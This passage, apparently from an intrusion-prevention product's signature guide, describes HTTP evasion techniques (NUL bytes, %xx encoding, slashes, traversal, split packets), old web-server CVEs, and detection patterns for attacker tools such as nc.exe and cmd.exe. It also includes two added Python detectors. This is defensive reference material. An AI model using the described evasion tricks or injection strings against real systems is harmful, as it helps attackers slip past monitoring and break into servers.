clients, but there may be servers that also support HTTP version 0.9. The syntax of an HTTP request for version
0.9 is <method><space><uri><CRLF>. This syntax differs from that of versions 1.0 and 1.1. Therefore, using the old
syntax sometimes helps attackers evade a modern IDS/IPS, since such devices parse the URI according to version 1.0 or
1.1 and fail to detect the anomaly in a version 0.9 HTTP request.
Signature ID: 350
HTTP Request Format Anomaly detection
Threat Level: Information
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. A general HTTP request should be of the form - <Method uri [version]\r\n>. After \r, \n is
expected. No other character is expected between \r and \n. This signature detects traffic that has a character, other than
\n, after \r, in the URI. Such traffic is generated to evade the IDS/IPS.
Signature ID: 351
Multiple requests in same packet vulnerability
Threat Level: Information
Signature Description: This is an anti-IIPS evasion technique. An HTTP 1.1 server supports persistent connections:
the server can serve many requests from a client over the same connection. Normally browsers send separate requests
in separate packets, but an attacker can send more than one request in a single packet to evade an IDS. Many IDS
check only the first request in the packet, so an attacker can send the real attack as the second or third request
in the same packet and reach the server while evading the IDS.
Signature ID: 352
HTTP Request Session Splicing vulnerability
Threat Level: Information
Signature Description: Session splicing is a network-level anti-ID system tactic. Many raw ID systems, as well as some
smart ones, only scan for a particular signature within the current packet; signatures are not split up and checked
across multiple packets. An attacker exploits this by sending parts of the request in different packets. Note that
this is not fragmentation; it is just multiple packets for the data. For example, the request "GET / HTTP/1.0" may be
split across multiple packets as "GE", "T ", "/", " H", "T", "TP", "/1", ".0".
Signature ID: 353
Encoded request vulnerability
Threat Level: Information
Signature Description: The classic trick with request encoding is to encode the request with its escaped equivalent.
The HTTP protocol specifies that arbitrary binary characters can be passed within the request by using %xx notation,
where 'xx' is the hex value of the character. In theory, raw ID systems would fall prey to this, since the signature
"cgi-bin" does not match the string "%63%67%69%2d%62%69%6e". Also in theory, smart ID systems would be able to
plow past this, since they would decode the string as a web server does before actually checking for a signature. In
reality, nowadays all worthwhile ID systems decode encoded requests, so this tactic is becoming obsolete.
Signature ID: 354
NULL Character in HTTP Request Line vulnerability
Threat Level: Information
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. HTTP header fields, which include general-header, request-header, response-header, and
entity-header fields, follow the same generic format as that given in RFC 822. The Request-Line begins with a method
token, followed by the Request-URI and the protocol version, and ends with CRLF. The elements are separated by space
(SP) characters. No CR or LF is allowed except in the final CRLF sequence. A general HTTP request should look like:
Method SP Request-URI SP HTTP-Version CRLF. This log corresponds to an anti-IIPS evasion technique. Many C
string libraries use the NULL character to denote the end of a string. Most intrusion detection/prevention systems use
these libraries to match the incoming strings (patterns) against the stored signatures. An attacker can use this to
her advantage with the following type of request: GET\0/cgi-bin/some.cgi HTTP/1.0. The theoretical flow of this
tactic is as follows. The web server receives the request, separating the URI from the method. The web server decodes
the method and the URI (or vice versa), maintaining a logically separate string containing the method. The method is
still valid in and of itself, as a string, to the web server, even with the trailing NULL. Some IDS, on the other
hand, decode the entire request and attempt to apply string operations to it; they stop once the NULL is reached,
because internally they call the C library. The implication is that an attacker can send any (malicious) URI and
bypass the IDS. The administrator should check the web server log corresponding to this log.
Signature ID: 355
HTTP Mis-Formatted URI with Many White Space as Separator
Threat Level: Information
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. HTTP header fields, which include general-header, request-header, response-header, and
entity-header fields, follow the same generic format as that given in RFC 822. The Request-Line begins with a method
token, followed by the Request-URI and the protocol version, and ends with CRLF. The elements are separated by space
(SP) characters. No CR or LF is allowed except in the final CRLF sequence. A general HTTP request should look like:
Method SP Request-URI SP HTTP-Version CRLF. This log corresponds to an anti-IIPS evasion technique. A smart ID
system could feasibly extract the URI of a request by using SP (spaces) as separators and adjust accordingly.
Interestingly enough, Apache (and perhaps earlier versions) allows a slightly different syntax:
Method<any number of spaces>URI<any number of spaces>HTTP/Version CRLF CRLF. This will ruin any
processing dependent on the 'assumed' RFC format of a request. It implies that there can be extra space characters
in the URI, so the IDS may miss an exact match. This rule triggers the alarm on receiving an HTTP request with many
space characters as separators. The administrator should check the web server for the corresponding log.
Signature ID: 356
HTTP Invalid Version String vulnerability
Threat Level: Information
Industry ID: CVE-2008-3257
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. HTTP header fields, which include general-header, request-header, response-header, and
entity-header fields, follow the same generic format as that given in RFC 822. The Request-Line begins with a method
token, followed by the Request-URI and the protocol version, and ends with CRLF. The elements are separated by space
(SP) characters. No CR or LF is allowed except in the final CRLF sequence. A general HTTP request should look like:
Method SP Request-URI SP HTTP-Version CRLF, where HTTP-Version should be HTTP/x.y. This rule triggers an
alarm when the version string is not in the form described above. This alert may not indicate an attack as such,
but as a precaution the administrator should check the web server logs.
Signature ID: 357
HTTP Header with Very Big Content Length vulnerability
Threat Level: Critical
Signature Description: The Hypertext Transfer Protocol is a communications protocol for the transfer of information on
the Internet. Its use for retrieving inter-linked text documents (hypertext) led to the establishment of the World
Wide Web. In an HTTP request, the Content-Length header indicates how many bytes of data follow. This rule triggers
if IIPS receives a very big content length in the request header. This log may not represent an attack, but should
be monitored.
Signature ID: 359
DOS/Win Directory Path Syntax in URI vulnerability
Threat Level: Information
Nessus: 10843
Signature Description: This is an anti-IIPS evasion technique. Microsoft Windows separates directories using '\',
unlike Unix. However, the HTTP RFC syntax calls for '/', so Windows must silently convert '/' to '\' internally in
IIS (as well as in all other DOS/Windows-based web servers). Interestingly enough, '\' can still be used in
requests, since it is still a valid directory separator. This implies that on DOS/Windows platforms a request such
as "/cgi-bin\some.cgi" can be used, which will not match a typical "/cgi-bin/some.cgi" signature. Using such
techniques, an attacker can bypass an IDS/IPS even though it has relevant rules for the attack or malicious
attempt.
Signature ID: 360
HTTP Absolute URI Present vulnerability
Threat Level: Information
Industry ID: CVE-2001-0647 Bugtraq: 2432 Nessus: 10636
Signature Description: According to RFC 2396, a Uniform Resource Identifier (URI) is a compact string of characters
for identifying an abstract or physical resource, denoted in either absolute or relative form. An absolute
identifier refers to a resource independent of the context in which the identifier is used. In contrast, a relative
identifier refers to a resource by describing the difference, within a hierarchical name space, between the current
context and an absolute identifier of the resource. A relative URI always starts with a '/', and HTTP clients
normally request resources this way (except through a proxy, in which case an absolute URI is used).
Signature ID: 361
HTTP Multiple Slashes in URI vulnerability
Threat Level: Information
Nessus: 10843
Signature Description: This is an anti-IIPS evasion technique. According to the HTTP RFC, every URI should use '/' to
traverse directories. However, most HTTP servers interpret '//' as '/'. Therefore "//cgi-bin//some.cgi" will
correctly be treated as "/cgi-bin/some.cgi" by the web server. However, if an IDS/IPS is not aware of this
interpretation, it will not match "//cgi-bin//some.cgi", as the signature will be "/cgi-bin/some.cgi". Smart ID
systems tend to interpret this correctly by logically combining all slashes into one, or at least by reporting such
an attempt.
Signature ID: 362
URI Reverse Traversal vulnerability
Threat Level: Information
Industry ID: CVE-2002-0893 Bugtraq: 4795 Nessus: 10959
Signature Description: This is an anti-IIPS evasion technique. This rule is more informational in nature. A classic
trick is to break apart a request such as "/cgi-bin/some.cgi HTTP/1.0" by using reverse directory traversal tricks:
"GET /cgi-bin/blahblah/../some.cgi HTTP/1.0", which equates to "/cgi-bin/some.cgi". Most smart ID systems account
for this (it is a core feature of what makes them 'smart'), and raw ID systems usually alert on the fact that the
request contains "/../".
Signature ID: 363
Attempt to Access Objects Beyond Web Root
Threat Level: Critical
Industry ID: CVE-2000-0664 CVE-2000-0884 CVE-2000-0919 CVE-2002-0307 CVE-2001-1204 CVE-2001-0871
CVE-2000-0187 CVE-2000-0674 CVE-2000-0126 CVE-2000-1076 CVE-2001-0804 CVE-2000-1019 CVE-2001-1209
CVE-1999-0776 CVE-1999-1509 CVE-2002-0661 CVE-2008-1145 CVE-2005-2847 Nessus:
10831,11001,10872,10819,10669,10818,10489,10025,10065,10467,10602,10115,10537,10589,10562,10789,10593,
10750,10574,10776,10656,10770,10817,10584,10542,10297,10367,10830,10672,10875,10010,10536,10063
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. HTTP is a client-server protocol, wherein a client makes a request and the server tries to
fulfill it. The web server runs on a system that also provides other services to users and may therefore contain
sensitive data, such as the system's own passwords in the "etc/passwd" file. There is a possibility that a client
may request a sensitive file. To deal with this, a root directory of the web server is defined, and all the files
that can be requested are generally kept under this directory. If a client wants to request something sensitive, it
has to escape the root directory of the server by directory traversal (/../../..). This rule triggers an alarm when
there has been an attempt to access objects beyond the web root directory. Such an attempt is suspicious, especially
from outside, and should be monitored for further analysis by the administrator. The rule triggers when it
encounters "/../" in the request.
Signature ID: 364
URI Self-Reference Directory vulnerability
Threat Level: Information
Nessus: 11007
Signature Description: This is an anti-IIPS evasion technique. A newer trick in the 'directory games' category is the
self-referencing directory. While '..' means the parent directory, '.' means the current directory. So "c:\temp\.\.\.\.\.\" is
equivalent to "c:\temp\". In an effort to stop raw ID systems from matching signatures like "/cgi-bin/phf", the
string can be changed to "/./cgi-bin/./phf". This rule hits when the system detects an HTTP request using the
above-mentioned trick.
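The request-line and URI checks that signatures 347 to 364 describe, as one added example written for this page (not HP's or the TMS module's code): the request line is split the way the entries above say a server does, the anomalies are tagged with the entry that describes them, and the URI is reduced to the canonical path a signature is written against, so that tabs, extra spaces, %xx encoding, NUL bytes, backslashes, "//", "/./" and "/../" all resolve to the same matchable string. The function names, tag strings and sample request lines are constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Hypothetical helper names; signature numbers in the comments refer to the
# entries above.
VERSION_RE = re.compile(rb"^HTTP/[0-9]+\.[0-9]+$")
SCHEME_RE = re.compile(rb"^[A-Za-z][A-Za-z0-9+.-]*://[^/]*")


def parse_request_line(line: bytes):
    """Split one raw request line into (method, uri, version, anomalies).

    Tags: tab-separator (347), nul-byte (348/354), http-0.9-syntax (349),
    cr-not-followed-by-lf (350), multiple-space-separator (355) and
    invalid-version (356).
    """
    anomalies = []
    if line.endswith(b"\r\n"):
        line = line[:-2]
    elif line.endswith(b"\n"):
        line = line[:-1]
    if b"\r" in line:                      # a CR that is not part of the final CRLF
        anomalies.append("cr-not-followed-by-lf")
    if b"\x00" in line:                    # a C string function would stop here
        anomalies.append("nul-byte")
    if b"\t" in line:                      # Apache accepts tabs as separators
        anomalies.append("tab-separator")
    if re.search(rb"[ \t]{2,}", line):     # runs of separators break naive splitting
        anomalies.append("multiple-space-separator")
    parts = [p for p in re.split(rb"[ \t]+", line) if p]
    method = uri = version = b""
    if len(parts) == 2:                    # Method SP URI CRLF, no version token
        method, uri = parts
        anomalies.append("http-0.9-syntax")
    elif len(parts) == 3:
        method, uri, version = parts
        if not VERSION_RE.match(version):  # must look like HTTP/x.y
            anomalies.append("invalid-version")
    else:
        anomalies.append("malformed-request-line")
        method = parts[0] if parts else b""
        uri = parts[1] if len(parts) > 1 else b""
    return method, uri, version, anomalies


def canonicalize_uri(uri: bytes):
    """Reduce a Request-URI to the path form that signatures are written in.

    Tags: absolute-uri (360), percent-encoded (353), nul-byte (348/354),
    backslash-separator (359), multiple-slash (361), self-reference (364),
    reverse-traversal (362) and traversal-beyond-root (363).
    """
    anomalies = []
    m = SCHEME_RE.match(uri)
    if m:                                  # strip scheme://host of an absolute URI
        anomalies.append("absolute-uri")
        uri = uri[m.end():] or b"/"
    path = uri.split(b"?", 1)[0]           # the query string is not part of the path
    decoded = unquote_to_bytes(path)       # %xx -> raw byte, as the web server does
    if decoded != path:
        anomalies.append("percent-encoded")
    if b"\x00" in decoded:                 # keep matching past the NUL, unlike strcmp()
        anomalies.append("nul-byte")
        decoded = decoded.replace(b"\x00", b"")
    if b"\\" in decoded:                   # DOS/Windows separator
        anomalies.append("backslash-separator")
        decoded = decoded.replace(b"\\", b"/")
    if b"//" in decoded:
        anomalies.append("multiple-slash")
    stack = []
    for seg in decoded.split(b"/"):
        if seg == b"":                     # empty segment: leading slash or '//'
            continue
        if seg == b".":                    # self-reference directory
            if "self-reference" not in anomalies:
                anomalies.append("self-reference")
            continue
        if seg == b"..":                   # parent directory
            tag = "reverse-traversal" if stack else "traversal-beyond-root"
            if stack:
                stack.pop()
            if tag not in anomalies:
                anomalies.append(tag)
            continue
        stack.append(seg)
    return b"/" + b"/".join(stack), anomalies


def matches_signature(uri: bytes, pattern: bytes) -> bool:
    """True when the canonical path contains the signature pattern."""
    path, _ = canonicalize_uri(uri)
    return pattern in path


if __name__ == "__main__":
    # Constructed request lines, one per trick described above.
    for line in (b"GET /cgi-bin/phf HTTP/1.0\r\n",
                 b"GET\t/%63gi-bin\\..\\cgi-bin/./phf\tHTTP/1.0\r\n",
                 b"GET //cgi-bin//some.cgi\r\n",
                 b"GET /cgi-bin/some.cgi%00 HTTP\x00/1.0\r\n"):
        method, uri, version, tags = parse_request_line(line)
        path, uri_tags = canonicalize_uri(uri)
        print(method, path, version, sorted(set(tags + uri_tags)))
```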
Signature ID: 365
Long HTTP Request Line Detected vulnerability
Threat Level: Information
Signature Description: This rule is triggered when a URL longer than the configured value is detected. Under
normal conditions a URL of such length is rarely sent, so its presence is suspicious. A very long HTTP request line
can be used to cause a buffer overflow in the remote HTTP server, which an attacker may use to execute arbitrary code
on the host.
Signature ID: 366
Premature URL request vulnerability
Threat Level: Information
Signature Description: This rule triggers when a user sends the \r and \n characters in encoded form; the actual
URL is sent after the encoded \r and \n characters. A remote attacker could exploit this vulnerability to execute
arbitrary commands on the system.
Signature ID: 367
HTTP Large Cookie Field Received vulnerability
Threat Level: Critical
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed,
collaborative, hypermedia information systems. There are many header fields in an HTTP request, and it has been
reported that a buffer overflow is possible in any of these fields. This rule triggers when the cookie field data
exceeds 6K bytes.
Signature ID: 368
GET or HEAD HTTP Request Packet with Data in Message Body vulnerability
Threat Level: Critical
Signature Description: This rule triggers when an attempt is made to send data in the message body (data portion) of
an HTTP request that uses the GET or HEAD method. When a request is made using either of these methods, data is
usually sent as part of the URL, so content in the data portion can be treated as an anomaly. The RFC, however,
does not say anything about sending data in the message body of an HTTP request when the GET or HEAD method is used.
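The request-size checks of signatures 343 to 346, 357, 367 and 368 applied to a raw request, as one added example written for this page (not HP's or the TMS module's code). The guide says these thresholds are configured in the IIPS Manager but gives only the 6K cookie limit, so every other default in `Limits` is an assumption; `build_request`, `check_request` and the sample requests are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Limits:
    """Thresholds. All values are assumed defaults except max_cookie, which the
    guide gives as 6K bytes for signature 367."""
    max_request_line: int = 2048                 # sig 343: long request line
    max_total_header: int = 16 * 1024            # sig 344: large overall header size
    max_header_line: int = 4096                  # sig 345: long single header line
    max_header_count: int = 64                   # sig 346: too many header lines
    max_content_length: int = 10 * 1024 * 1024   # sig 357: very big Content-Length
    max_cookie: int = 6 * 1024                   # sig 367: large Cookie field


def build_request(method: bytes, target: bytes, headers, body: bytes = b"") -> bytes:
    """Assemble a raw HTTP/1.1 request; used only to construct the samples."""
    head = b"%s %s HTTP/1.1\r\n" % (method, target)
    head += b"".join(b"%s: %s\r\n" % (name, value) for name, value in headers)
    return head + b"\r\n" + body


def check_request(raw: bytes, limits: Optional[Limits] = None) -> List[str]:
    """Return the size-anomaly tags that apply to one raw request."""
    limits = limits or Limits()
    findings: List[str] = []

    def flag(tag: str) -> None:
        if tag not in findings:
            findings.append(tag)

    # Split head from body on the first blank line (CRLF or bare LF endings).
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head, _, body = raw.partition(sep)
    lines = re.split(rb"\r?\n", head)
    request_line, header_lines = lines[0], lines[1:]

    if len(request_line) > limits.max_request_line:
        flag("long-request-line")                # sig 343
    if len(head) > limits.max_total_header:
        flag("large-request-header")             # sig 344
    if len(header_lines) > limits.max_header_count:
        flag("too-many-header-lines")            # sig 346

    content_length: Optional[int] = None
    for hl in header_lines:
        if len(hl) > limits.max_header_line:
            flag("long-header-line")             # sig 345
        name, _, value = hl.partition(b":")
        name, value = name.strip().lower(), value.strip()
        if name == b"cookie" and len(value) > limits.max_cookie:
            flag("large-cookie")                 # sig 367
        if name == b"content-length":
            if value.isdigit():
                content_length = int(value)
            else:
                flag("bad-content-length")
    if content_length is not None and content_length > limits.max_content_length:
        flag("huge-content-length")              # sig 357

    method = request_line.split(b" ", 1)[0].upper()
    if method in (b"GET", b"HEAD") and (body or (content_length or 0) > 0):
        flag("body-with-get-or-head")            # sig 368
    return findings


# Constructed samples, not captured traffic.
SAMPLES = {
    "normal": build_request(b"GET", b"/index.html", [(b"Host", b"www.example.com")]),
    "big-cookie": build_request(b"GET", b"/", [(b"Host", b"www.example.com"),
                                               (b"Cookie", b"session=" + b"A" * 7000)]),
    "get-with-body": build_request(b"GET", b"/", [(b"Host", b"www.example.com"),
                                                  (b"Content-Length", b"5")], b"hello"),
    "huge-length": build_request(b"POST", b"/upload", [(b"Host", b"www.example.com"),
                                                       (b"Content-Length", b"99999999999")]),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, check_request(raw))
```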
Signature ID: 369
HTTP URI Invalid UTF 16 Encoding vulnerability
Threat Level: Information
Signature Description: In order to represent characters beyond ASCII, Unicode was introduced, which allows character
values far beyond the ASCII range (256). To represent those Unicode code points there are many encoding schemes,
and UTF-16 is one of them. UTF-16 encodes each Unicode character using either one or two 16-bit words (i.e. two or
four bytes), depending on the code point of the character. Unicode assigns each character a code point between
U+000000 and U+10FFFF. Depending upon the language and Unicode page, different codes can mean different
characters. Such complexity has also led to some IDS evasion techniques. Therefore it is of paramount importance to
decode UTF-16 characters correctly. The rule triggers if it finds an encoding that does not strictly follow the
standard. Such HTTP requests may be indicative of malicious activity.
Signature ID: 370
Null Bytes in HTTP Request vulnerability
Threat Level: Critical
Industry ID: CVE-2000-0671 Bugtraq: 1510,3810 Nessus: 10479,10837
Signature Description: According to the HTTP RFC, no NULL byte should be present in the URI. However, many servers
ignore NULL bytes and process the request. An attacker can take advantage of this by sending NULL bytes (encoded or
not) in an HTTP request: if any C function is used by the IDS/IPS device, matching can be avoided, since most C
functions treat a NULL byte as 'end of string'. In this way, the pattern may not be matched. This rule hits when the
system detects any such attempt in an HTTP request.
Signature ID: 371
URI Invalid UTF-8 Coding vulnerability
Threat Level: Information
Industry ID: CVE-2001-1217 Bugtraq: 3727 Nessus: 10854
Signature Description: HTTP (HyperText Transfer Protocol) is a protocol used by the World Wide Web for transferring
files (text, graphics, images, sound, video, and other multimedia files). HTTP web servers are enabled with Unicode
encoding and decoding and support the UTF-8 and UTF-16 encoding styles. There are reports on the misuse of UTF
encoding to launch various attacks. This rule hits when invalid UTF-8 Unicode encoding is detected in an HTTP
request.
Signature ID: 372
Unknown Unicode Mapping in HTTP Request vulnerability
Threat Level: Information
Signature Description: HTTP web servers are enabled with Unicode encoding and decoding. Each Unicode value is mapped
to a specific character and therefore, depending on the region, a suitable Unicode page is used. There are reports
on the misuse of Unicode encoding to launch various attacks. This signature detects an unknown Unicode mapping in an
HTTP request.
Signature ID: 373
Null Character in HTTP Version String vulnerability
Threat Level: Information
Signature Description: This is an anti-IIPS evasion technique. Many C string libraries use the NULL character to
denote the end of a string. Many ID/IP systems use these libraries (they are typically too slow for these high-speed
applications) without realizing the consequence of NULL as a string terminator. An attacker can use this to her
advantage with the following type of request: GET /cgi-bin/some.cgi HTTP\0/1.0. This type of behavior can fool an
IDS/IPS, because the IDS/IPS will not be able to parse the URI properly.
Signature ID: 374
FastCGI Echo.exe Cross Site Scripting vulnerability
Threat Level: Information
Nessus: 10838
Signature Description: FastCGI is an open extension to CGI that provides high performance without the limitations of
server-specific APIs, and is included in the default installation of the Oracle9i Application Server. Various other
web servers support the FastCGI extensions. Two sample CGIs are installed with FastCGI (echo.exe and echo2.exe under
Windows). Both of these CGIs output a list of environment variables and path information for various applications.
FastCGI is vulnerable to cross-site scripting. This rule generates an event when an attacker sends the
'fcgi-bin/echo.exe' pattern to the HTTP server.
Signature ID: 375
FastCGI Echo2.exe Cross Site Scripting vulnerability
Threat Level: Information
Nessus: 10838
Signature Description: FastCGI is an open extension to CGI that provides high performance without the limitations of
server-specific APIs, and is included in the default installation of the Oracle9i Application Server. Various other
web servers support the FastCGI extensions. Two sample CGIs are installed with FastCGI (echo.exe and echo2.exe under
Windows). Both of these CGIs output a list of environment variables and path information for various applications.
FastCGI is vulnerable to cross-site scripting. This rule generates an event when an attacker sends the 'echo2.exe?'
pattern to the HTTP server.
Signature ID: 376
Apache Remote Command Execution via .bat files vulnerability
Threat Level: Information
Industry ID: CVE-2002-0061 Bugtraq: 4335 Nessus: 10938
Signature Description: The Apache HTTP Server is a freely available web server that runs on a variety of operating
systems including Unix, Linux, and Microsoft Windows. Apache supports the Common Gateway Interface (CGI), which
defines a standard interface between the HTTP server and external applications. Apache HTTP Server 1.3.9 is
vulnerable. If a remote attacker sends a request for a .bat or .cmd DOS batch file appended with the pipe character "|"
followed by arbitrary commands, the attacker could use the cmd.exe shell interpreter to execute arbitrary commands on
the vulnerable system. This vulnerability is fixed in version 1.3.24. Administrators are advised to update to version
1.3.24 or later to resolve this vulnerability.
Signature ID: 377
Nethief Virus/Trojan vulnerability
Threat Level: Information
Signature Description: Trojan horses are malicious programs that attackers usually bind to some other application
or process, such as greeting cards or games. When the user opens or triggers it, the malicious program installs
itself on the user's computer and tries to open a backdoor silently, giving an attacker a way to take full control
of the user's system. This trojan copies itself under the name IEXPLORER.EXE (the real one is IEXPLORE.EXE) and
appears to use that name as its User-Agent. The trojan (apparently) targets only Win32 operating systems.
Signature ID: 378
Directory.php Shell Command Execution Vulnerability
Threat Level: Severe
Industry ID: CVE-2002-0434 Bugtraq: 4278 Nessus: 11017
Signature Description: The directory.php script provides a web interface for directory listings, similar to the 'ls'
command. Xenakis directory.php is vulnerable to shell command execution. This vulnerability is due to insufficient
sanitization of user supplied meta characters such as ";" or "|" in the script's input. No remedy is available as of
September 13, 2008.
Signature ID: 379
Php POST file uploads vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0081 Bugtraq: 4183 Nessus: 10867
Signature Description: PHP is a widely used general purpose scripting language that is especially suited for Web
development and can be embedded into HTML. PHP (4.1.0, 4.1.1, 4.0.6) and earlier versions are vulnerable to a heap
based buffer overflow. This vulnerability is due to insufficient sanitization of user supplied data. A successful
exploitation of this vulnerability allows an attacker to execute arbitrary commands on the vulnerable system. This
vulnerability is fixed in version 4.1.2. Administrators are advised to update to version 4.1.2 or later to resolve
this issue.
Signature ID: 380
Php POST file uploads vulnerable
Threat Level: Warning
Industry ID: CVE-2002-0081 Bugtraq: 4183 Nessus: 10867
Signature Description: PHP is a widely used general purpose scripting language that is especially suited for Web
development and can be embedded into HTML. PHP 3.0.x and earlier versions are vulnerable to a heap based buffer
overflow. This vulnerability is due to insufficient sanitization of user supplied data. A successful exploitation of
this vulnerability allows an attacker to execute arbitrary commands on the vulnerable system. This vulnerability is
fixed in version 4.1.2. Administrators are advised to update to version 4.1.2 or later to resolve this issue.
Signature ID: 381
Access to Vulnerable Cart32 CGI vulnerable
Threat Level: Severe
Industry ID: CVE-2000-0429 Bugtraq: 1153 Nessus: 10389
Signature Description: Cart32 is shopping cart software built for Microsoft servers using Visual Basic, a MySQL
database, and HTML components. Cart32 provides shopping cart, checkout, and storefront hosting facilities to tens of
thousands of online retail clients internationally. Cart32 3.0 is vulnerable to reconnaissance. A successful
exploitation of this vulnerability allows an attacker to obtain usernames, passwords, credit card numbers, and other
crucial details. No remedy is available.
Signature ID: 383
Access to Vulnerable Dansie Shopping Cart CGI
Threat Level: Warning
Industry ID: CVE-2000-0252 CVE-2000-0254 Bugtraq: 1115 Nessus: 10368
Signature Description: The Dansie Shopping Cart is an e-commerce solution. Dansie Shopping Cart 3.04 is vulnerable:
it allows remote users to modify shopping cart contents by requesting a certain URL with altered variables. This
signature specifically detects the "cart.pl" pattern in the traffic sent to the HTTP server.
Signature ID: 385
IIS Sample File cmd.exe vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0540 Bugtraq: 1386 Nessus: 11003,10444,10996
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, developed by
Microsoft, that includes a Hypertext Transfer Protocol service and a File Transfer Protocol service. This signature
detects an attempt to exploit potential weaknesses in a host running Microsoft IIS. A successful exploitation of
this vulnerability allows an attacker to access sensitive information on the vulnerable system. This signature
specifically detects the "cmd.exe" pattern in the traffic sent to the HTTP server.
Signature ID: 386
IIS Sample File root.exe vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0540 Bugtraq: 1386 Nessus: 11003,10444,10996
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, developed by
Microsoft, that includes a Hypertext Transfer Protocol service and a File Transfer Protocol service. This signature
detects an attempt to exploit potential weaknesses in a host running Microsoft IIS. A successful exploitation of
this vulnerability allows an attacker to access sensitive information on the vulnerable system. This signature
specifically detects the "shell.exe" pattern in the traffic sent to the HTTP server. This signature detects access to
root.exe.
Signature ID: 387
IIS Sample File bin.exe vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0539 CVE-2000-0540 Bugtraq: 1386 Nessus: 11003,10444,10996
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, developed by
Microsoft, that includes a Hypertext Transfer Protocol service and a File Transfer Protocol service. This signature
detects an attempt to exploit potential weaknesses in a host running Microsoft IIS. A successful exploitation of
this vulnerability allows an attacker to access sensitive information on the vulnerable system. This signature
specifically detects the "shell.exe" pattern in the traffic sent to the HTTP server. This signature detects access to
bin.exe.
Signature ID: 388
IIS Sample File shell.exe vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0540 Bugtraq: 1386 Nessus: 11003,10444,10996
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "shell.exe" pattern in
traffic sent to the HTTP server.
Signature ID: 389
IIS Sample File hack.exe vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0539 CVE-2000-0540 Bugtraq: 1386 Nessus: 11003,10444,10996
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "hack.exe" pattern in
traffic sent to the HTTP server.
Signature ID: 390
IIS Sample File nc.exe vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0540 Bugtraq: 1386 Nessus: 11003,10444,10996
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "nc.exe" pattern in
traffic sent to the HTTP server. nc.exe is the Netcat network utility, which attackers upload to a compromised web
server to obtain a remote shell; a request for it under the web root indicates attacker tooling on the host rather than a
flaw in IIS itself.
Signature ID: 391
IIS Sample File ncx.exe vulnerability
Threat Level: Warning
Nessus: 11003
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "ncx.exe" pattern in
traffic sent to the HTTP server.
Signature ID: 392
IIS Sample File netcat.exe vulnerability
Threat Level: Warning
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "netcat.exe" pattern in
traffic sent to the HTTP server. netcat.exe is the Netcat network utility under its full name; as with nc.exe, a request
for it from the web root indicates attacker tooling left on the host.
Signature ID: 393
IIS Sample File FireDaemon.exe vulnerability
Threat Level: Warning
Nessus: 11003
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "FireDaemon.exe" pattern
in traffic sent to the HTTP server. FireDaemon is a utility that runs an arbitrary program as a Windows service;
attackers use it to keep tools such as Netcat listeners running across reboots, so its presence under the web root
indicates an already compromised host.
Signature ID: 394
IIS Sample File Fire.exe vulnerability
Threat Level: Warning
Nessus: 11003
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "Fire.exe" pattern in
traffic sent to the HTTP server.
Signature ID: 395
IIS Sample File FireD.exe vulnerability
Threat Level: Warning
Nessus: 11003
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "FireD.exe" pattern in
traffic sent to the HTTP server.
Signature ID: 396
